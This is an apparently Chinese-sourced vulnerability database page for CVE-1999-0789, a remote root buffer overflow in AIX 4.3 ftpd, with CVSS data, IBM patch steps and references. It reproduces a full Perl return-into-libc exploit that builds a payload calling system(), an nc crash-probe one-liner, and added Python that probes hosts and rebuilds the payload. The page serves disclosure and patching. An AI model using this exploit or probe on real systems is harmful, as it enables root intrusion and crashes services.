CVE-1999-0789
CVSS 10.0
Published: 1999-09-28 00:00:00
Revised: 2008-09-09 08:35:38

[Original] Buffer overflow in AIX ftpd in the libc library.


[CNNVD] AIX ftpd remote buffer overflow vulnerability (CNNVD-199909-053)

        
        AIX ftpd has a remote buffer overflow; a remote attacker can obtain root privileges.
        The following check can be used to test whether an AIX ftpd is vulnerable:
        perl -e 'print "A" x 5000' | nc -v -v aix 21
        If the connection returns immediately (ftpd has crashed), the service is vulnerable. If many errors of the form "500 AAAAA... unknown command" come back, the service is not affected. Note that on a vulnerable host the check itself crashes the daemon handling the connection, so run it only where that is acceptable.
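As an added example (not part of the CNNVD record or IBM's advisory), the same check written as a small Python client: it reads the 220 banner, sends one over-long command line, and classifies the outcome the way the text does, a connection dropped with no reply meaning the daemon died, a run of 500 replies meaning the input was rejected. The host and port arguments and the local fake servers used for the self-test are this example's own assumptions.

```python
"""Probe an FTP service for the crash signature described above.

Added example for this page, not IBM's or the exploit author's code.
The verdict strings follow the text: no reply and a dropped connection
means ftpd died (vulnerable); only "500 ..." replies means the junk line
was rejected (not affected). The fake servers are constructed for self-test.
"""
import socket
import threading

PROBE_LEN = 5000               # same length as the page's one-liner
VULNERABLE = "vulnerable (ftpd crashed)"
PATCHED = "not affected (input rejected)"
UNKNOWN = "inconclusive"


def build_probe(length=PROBE_LEN):
    """Overlong FTP command line: 'A' * length, terminated like a real client."""
    return b"A" * length + b"\r\n"


def classify(replies, connection_closed):
    """Turn what the server did into the verdict the page describes."""
    lines = [ln for ln in replies.split(b"\r\n") if ln]
    if lines:
        # A patched ftpd answers each chunk of the junk line with a 500 reply.
        if all(ln.startswith(b"500") for ln in lines):
            return PATCHED
        return UNKNOWN
    if connection_closed:
        return VULNERABLE          # died without answering anything
    return UNKNOWN


def probe(sock, length=PROBE_LEN, timeout=5.0):
    """Run the probe over a connected socket and return a verdict string."""
    sock.settimeout(timeout)
    try:
        sock.recv(1024)            # 220 greeting, discarded
        sock.sendall(build_probe(length))
    except OSError:
        return UNKNOWN
    data, closed = b"", False
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:          # orderly EOF: the server went away
                closed = True
                break
            data += chunk
    except socket.timeout:
        pass                       # server still up; judge on what it sent
    except ConnectionResetError:
        closed = True              # RST: the process handling us is gone
    return classify(data, closed)


def probe_host(host, port=21, timeout=5.0):
    """Connect to host:port and run the probe. Destructive on vulnerable hosts."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return probe(sock, timeout=timeout)


def fake_ftpd(behaviour):
    """Self-test helper (constructed): a local listener that either goes away
    after reading the probe ("crash") or answers it with 500 replies
    ("patched"). Returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(b"220 aix FTP server (Version 4.3) ready.\r\n")
        f = conn.makefile("rb")
        f.readline()                            # consume the whole junk line
        f.close()
        if behaviour == "patched":
            for _ in range(5):
                conn.sendall(b"500 'AAAA...': command not understood.\r\n")
        conn.close()                            # "crash": just disappear
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for mode in ("crash", "patched"):
        print(mode, "->", probe_host("127.0.0.1", fake_ftpd(mode), timeout=2.0))
```

Unlike the nc one-liner, the client terminates the line with CRLF and distinguishes an orderly EOF from a reset, so a server that merely rate-limits or times out is reported as inconclusive rather than as vulnerable.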
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:4.3    IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1  IBM AIX 4.3.1
cpe:/o:ibm:aix:4.3.2  IBM AIX 4.3.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0789
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0789
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-053
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/679
(UNKNOWN)  BID  679
http://www.ciac.org/ciac/bulletins/j-072.shtml
(UNKNOWN)  CIAC  J-072

- Vulnerability information

AIX ftpd remote buffer overflow vulnerability
Critical  Boundary condition error
1999-09-28 00:00:00  2005-05-02 00:00:00
Remote
        

- Advisory and patch

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * If your AIX version is earlier than 4.2.x it is not affected; otherwise, temporarily stop the ftp service.
        Vendor patch:
        IBM
        ---
        IBM has released a security advisory (ERS-SVA-E01-1999:004.1) and a corresponding patch:
        ERS-SVA-E01-1999:004.1: Remote buffer overflow in ftpd daemon.
        Patch download:
        ftp://aix.software.ibm.com/aix/efixes/security/ftpd.tar.Z
        Checksums of the replacement binary as listed by IBM (file name, sum, MD5); compare them against the unpacked file before installing:
        ftpd 02584 147 4577818c9c95b47ffc915ab750f36bd3
        Installation:
        1. Unpack the patch.
        # uncompress < ftpd.tar.Z | tar xf -
        # cd ftpd
        2. Replace the vulnerable ftpd. The old binary is kept for rollback but stripped of all permissions; the new one gets mode 4554 (setuid root, executable by owner and group, readable by others).
        # mv /usr/sbin/ftpd /usr/sbin/ftpd.before_security_fix
        # chown root.system /usr/sbin/ftpd.before_security_fix
        # chmod 0 /usr/sbin/ftpd.before_security_fix
        # cp ./ftpd /usr/sbin/ftpd
        # chown root.system /usr/sbin/ftpd
        # chmod 4554 /usr/sbin/ftpd

- Vulnerability information (19532)

IBM AIX <= 4.3.2 ftpd Remote Buffer Overflow (EDBID:19532)
aix remote
1999-09-28 Verified
0 Gerrie
N/A
source: http://www.securityfocus.com/bid/679/info

A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access. 

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is a return-into-libc exploit specifically crafted for
# one box and it is very unlikely to work on another box

# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek

# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
#      we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffer
#             loads r0 with the next address to jump to (0x1001038c)
#             and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
#             sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is the place where TOC is stored but it doesn't seem
#            to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf =  the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
#        0xd00406d4 in our case
# 0x00c: this is the address where r2 is loaded
#        from just before the call to
#        system(..) we set it to the TOC in our program we don't know if it
#        matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
#     l   r2, 0x14(r1)
#     b   0x10015228
# 0x10015228:
#     l   r12, 0x110(r2)
#     st  r12, 0x14(r1)
#     l   r0, 0x0(r12)
#     l   r2, 0x4(r12)
#     b   r0
# 0x1001038c:
#     l   r3, 0x40(r1)
#     b   0x100136f8
# 0x100136f8:
#     l   r12, 0x3c(r2)
#     st  r12, 0x14(r1)
#     l   r0,  0x0(r12)
#     l   r2,  0x04(r12)

# *** Synnergy Networks

$bufstart = 0x2ff22724;         # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c";     # 0 address of second piece of
                                # 'borrowed' code
$buf .= pack ("N", $bufstart);  # 4
$buf .= "\xd0\x04\x06\xd4";     # 8 system call..
$buf .= "\xf0\x14\x63\x5c";     # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
    $offset += 4;
    $buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
    $offset += 4;
    $buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";

# of course you should change this.
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;

# EOF
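Added example, not dvorak's code: a Python model that rebuilds the buffer from the constants in the script above and replays the register flow listed in its comments, reading each load from the buffer as though it were mapped at $bufstart. Only the buffer itself is modelled as memory (an assumption of this example; the gadgets' text and libc are represented by their addresses alone), so a wrong guess for $bufstart shows up as a load that falls outside the buffer, which is exactly why the script is tied to one box.

```python
"""Layout check for the return-into-libc chain in the exploit above.

Added example for this page, not the exploit author's code. It builds the
same slot layout the perl script does, then replays the loads of gadgets
1-4 from the comments. Only the buffer is treated as mapped memory; any
load outside it raises, which is how a wrong $bufstart shows up.
"""
import struct

BUFSTART = 0x2ff22724      # the exploit's "first guess" for the buffer
GADGET1 = 0x10010150       # l r2,0x14(r1); b GADGET2
GADGET2 = 0x10015228       # l r12,0x110(r2); st r12,0x14(r1); l r0,0(r12); l r2,4(r12); b r0
GADGET3 = 0x1001038c       # l r3,0x40(r1); b GADGET4
GADGET4 = 0x100136f8       # l r12,0x3c(r2); st r12,0x14(r1); l r0,0(r12); l r2,4(r12); b r0
SYSTEM = 0xd00406d4        # libc system()
TOC = 0xf014635c           # value the exploit loads into r2 before the call
NOP = b"\xde\xad\xca\xfe"  # filler between the live slots, as in the script
R1_OFFSET = 0x1fc          # per the comments, r1 points at buf[0x1fc]
CMD_OFFSET = 0x240         # where the command string lives


def build_buffer(bufstart=BUFSTART, cmd=b"/tmp/sh"):
    """The stack buffer (everything after the 'CEL ' verb), slot by slot."""
    slots = {
        0x000: GADGET3,                # r0 after gadget 2
        0x004: bufstart,               # r2 after gadget 2
        0x008: SYSTEM,                 # r0 after gadget 4
        0x00c: TOC,                    # r2 after gadget 4
        0x03c: bufstart + 0x008,       # r12 in gadget 4
        0x110: bufstart,               # r12 in gadget 2
        0x204: GADGET1,                # saved LR slot, 8(r1)
        0x210: bufstart,               # r2 in gadget 1, 0x14(r1)
        0x23c: bufstart + CMD_OFFSET,  # r3 in gadget 3, 0x40(r1)
    }
    buf = bytearray(NOP * (CMD_OFFSET // 4))
    for off, val in slots.items():
        buf[off:off + 4] = struct.pack(">I", val)
    return bytes(buf) + cmd + b"\n"


def build_payload(bufstart=BUFSTART, cmd=b"/tmp/sh"):
    """Bytes sent on the control connection: verb, space, buffer."""
    return b"CEL " + build_buffer(bufstart, cmd)


def load(buf, bufstart, addr):
    """Big-endian word at addr; only the buffer itself is 'mapped'."""
    off = addr - bufstart
    if off < 0 or off + 4 > len(buf):
        raise ValueError("load from 0x%08x falls outside the buffer" % addr)
    return struct.unpack(">I", buf[off:off + 4])[0]


def walk_chain(buf, bufstart=BUFSTART):
    """Replay the chain's loads; return the registers handed to system()."""
    def mem(addr):
        return load(buf, bufstart, addr)
    r1 = bufstart + R1_OFFSET
    if mem(r1 + 8) != GADGET1:            # overwritten return address
        raise ValueError("saved LR does not point at gadget 1")
    r2 = mem(r1 + 0x14)                   # gadget 1
    r12 = mem(r2 + 0x110)                 # gadget 2
    r0, r2 = mem(r12), mem(r12 + 4)
    if r0 != GADGET3:
        raise ValueError("gadget 2 did not branch to gadget 3")
    r3 = mem(r1 + 0x40)                   # gadget 3
    r12 = mem(r2 + 0x3c)                  # gadget 4
    r0, r2 = mem(r12), mem(r12 + 4)
    off = r3 - bufstart                   # what system() will read at r3
    if not 0 <= off < len(buf):
        raise ValueError("r3 points outside the buffer")
    cmd = buf[off:].split(b"\n", 1)[0].split(b"\0", 1)[0]
    return {"r0": r0, "r2": r2, "r3": r3, "cmd": cmd}


def chain_ok(buf, bufstart=BUFSTART):
    """True if the chain reaches system() with a non-empty command."""
    try:
        regs = walk_chain(buf, bufstart)
    except ValueError:
        return False
    return regs["r0"] == SYSTEM and regs["cmd"] != b""


if __name__ == "__main__":
    print(walk_chain(build_buffer()))
    print("right guess:", chain_ok(build_buffer(), BUFSTART))
    print("wrong guess:", chain_ok(build_buffer(), BUFSTART + 0x100))
```

Shifting the guessed base by 0x100 makes gadget 2 load its r12 from a filler word, and the next load from 0xdeadcafe leaves the buffer; the walker reports that instead of guessing, which mirrors what happens on a host whose stack layout differs from the one the script was built against.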
		

- Vulnerability information

9
IBM AIX FTPD libc Library Remote Overflow
Remote / Network Access  Input Manipulation
Loss of Integrity  Patch / RCS
Exploit Public  Third-party Verified

- Vulnerability description

A remote overflow exists in IBM AIX. The libc library fails to perform proper bounds checking allowing an attacker to execute arbitrary commands via the FTPD daemon.

- Timeline

1999-09-28 Unknown
1999-09-28 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, IBM has released a patch to address this vulnerability.

- References

- Vulnerability author

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of The MITRE Corporation; their official data sources are kept on MITRE's websites.